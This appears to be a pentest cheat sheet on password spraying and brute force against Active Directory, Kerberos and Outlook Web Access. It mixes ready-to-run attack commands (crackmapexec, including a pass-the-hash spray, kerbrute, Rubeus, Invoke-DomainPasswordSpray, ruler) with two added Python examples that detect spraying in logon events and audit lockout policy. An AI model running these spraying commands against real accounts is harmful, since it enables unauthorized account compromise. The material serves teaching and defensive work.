Password Spraying / Brute Force

Password Spraying

Once you have found several valid usernames you can try the most common passwords (keep in mind the password policy of the environment) against each of the discovered users. By default the minimum password length is 7.

Lists of common usernames could also be useful: https://github.com/insidetrust/statistically-likely-usernames

Note that you could lock out some accounts if you try several wrong passwords (by default more than 10).
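The trade-off just described (many accounts, very few guesses each, to stay under the lockout threshold) is also what makes spraying visible in logs. The following is an added example and not part of the original page: it takes failed-logon records in the shape of Windows Security Event ID 4625 fields (target user, source address, NTSTATUS) and, per source address, reports a window with many distinct accounts and at most a couple of attempts each as a spray, and a window with many attempts against one account as a brute force. The events, thresholds and record layout are constructed for the example; the same logic applies to Kerberos pre-authentication failures (Event ID 4771), which is what kerbrute-style spraying produces.

```python
# Added example: classify failed logons by source address as password spraying
# or brute force. The event records below are constructed, not real captures.
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# NTSTATUS values in Event ID 4625 that mean "bad credentials" (a guess) rather
# than a disabled, expired or locked account, which would skew the counts.
GUESS_STATUS = {"0xC000006A", "0xC000006D"}

# Constructed records: (timestamp, target user, source address, NTSTATUS)
SAMPLE_EVENTS = [
    # spray: one source tries six accounts, one attempt each, inside two minutes
    ("2024-05-01T09:00:01", "larsson", "10.10.10.50", "0xC000006A"),
    ("2024-05-01T09:00:12", "cube0x0", "10.10.10.50", "0xC000006A"),
    ("2024-05-01T09:00:25", "a.admin", "10.10.10.50", "0xC000006A"),
    ("2024-05-01T09:00:40", "c.cube", "10.10.10.50", "0xC000006A"),
    ("2024-05-01T09:00:55", "s.svensson", "10.10.10.50", "0xC000006A"),
    ("2024-05-01T09:01:10", "j.doe", "10.10.10.50", "0xC000006A"),
    # brute force: one source, one account, twelve attempts in twelve seconds
    *[(f"2024-05-01T10:00:{i:02d}", "administrator", "10.10.10.77", "0xC000006A")
      for i in range(12)],
    # benign: a user mistyping twice, plus a disabled service account (not a guess)
    ("2024-05-01T11:00:00", "m.lee", "10.10.10.9", "0xC000006A"),
    ("2024-05-01T11:00:30", "m.lee", "10.10.10.9", "0xC000006A"),
    ("2024-05-01T11:05:00", "old.svc", "10.10.10.9", "0xC0000072"),
]


def classify_sources(events, window=timedelta(minutes=30), spray_min_users=5,
                     spray_max_per_user=2, brute_min_attempts=10):
    """Return {source: (kind, distinct_users, attempts)} for every source whose
    failed logons inside any `window` look like a spray or a brute force.

    A spray is at least `spray_min_users` distinct accounts with no account
    guessed more than `spray_max_per_user` times; a brute force is any single
    account guessed at least `brute_min_attempts` times. The thresholds are
    illustrative and should be tuned to the environment's lockout policy.
    """
    by_source = defaultdict(list)
    for ts, user, src, status in events:
        if status in GUESS_STATUS:
            by_source[src].append((datetime.fromisoformat(ts), user))

    findings = {}
    for src, recs in by_source.items():
        recs.sort()
        # Slide a window starting at each event and stop at the first verdict.
        for i, (start, _) in enumerate(recs):
            per_user = Counter()
            for t, user in recs[i:]:
                if t - start > window:
                    break
                per_user[user] += 1
            attempts = sum(per_user.values())
            if len(per_user) >= spray_min_users and max(per_user.values()) <= spray_max_per_user:
                findings[src] = ("spray", len(per_user), attempts)
                break
            if max(per_user.values()) >= brute_min_attempts:
                findings[src] = ("brute_force", len(per_user), attempts)
                break
    return findings


if __name__ == "__main__":
    for src, (kind, users, attempts) in classify_sources(SAMPLE_EVENTS).items():
        print(f"{src}: {kind} ({users} accounts, {attempts} failed attempts)")
```

Running the block reports 10.10.10.50 as a spray over 6 accounts and 10.10.10.77 as a brute force against one account, while the two typos from 10.10.10.9 and the disabled-account failure produce nothing. Filtering on the NTSTATUS first matters: once a spray starts locking accounts, the 0xC0000234 (locked out) failures would otherwise inflate the per-user counts and make a spray look like a brute force.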

Get the password policy

If you have some user credentials or a shell as a domain user you can get the password policy with:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
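Reading the policy is only useful if you act on what it says. The following is an added example, not part of the original page: it parses the output of `net accounts` shown above into a dictionary and flags the settings that make an account-guessing campaign cheap, in particular a lockout threshold of Never (no lockout at all) and a short minimum length. The sample output and the baselines (14 characters, a threshold of at most 10) are this example's own choices; the parser only handles the `net accounts` layout, not the differently formatted output of crackmapexec or rpcclient.

```python
# Added example: parse `net accounts` output and flag policy settings that make
# password spraying cheap. The sample output below is constructed for the example.

SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""


def parse_net_accounts(text):
    """Turn `net accounts` output into {setting: value}; numeric values become int."""
    policy = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # e.g. "The command completed successfully."
        value = value.strip()
        policy[key.strip()] = int(value) if value.isdigit() else value
    return policy


def audit_policy(policy, min_length=14, max_threshold=10):
    """Return a list of findings about the lockout and length settings.

    `min_length` and `max_threshold` are baselines chosen by this example, not
    values taken from Windows defaults; adjust them to the organisation's standard.
    """
    findings = []
    threshold = policy.get("Lockout threshold")
    if threshold == "Never":
        findings.append("lockout threshold is Never: unlimited guesses per account")
    elif isinstance(threshold, int) and threshold > max_threshold:
        findings.append(f"lockout threshold {threshold} is above {max_threshold}")
    length = policy.get("Minimum password length")
    if isinstance(length, int) and length < min_length:
        findings.append(f"minimum password length {length} is below {min_length}")
    if policy.get("Length of password history maintained") == 0:
        findings.append("no password history: old passwords can be reused")
    return findings


if __name__ == "__main__":
    for finding in audit_policy(parse_net_accounts(SAMPLE_NET_ACCOUNTS)):
        print("[!]", finding)
```

On the sample output this reports two findings: the Never lockout threshold and the 7-character minimum. A policy with a lockout threshold of 5, a 14-character minimum and a non-zero history returns an empty list.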

Using crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicates to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

  • Using kerbrute (Go):

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

  • spray (you can indicate the number of attempts to avoid lockouts):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • Using kerbrute (python) - NOT RECOMMENDED, SOMETIMES DOESN'T WORK

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

  • With the scanner/smb/smb_login module of Metasploit:

  • Using rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

From Windows

  • With the Rubeus version that has the brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

  • With Invoke-DomainPasswordSpray (it can generate users from the domain by default, and it will get the password policy from the domain and limit tries according to it):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

There are multiple tools for password spraying against Outlook.

To use any of these tools, you need a user list and a password / a small list of passwords to spray.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta
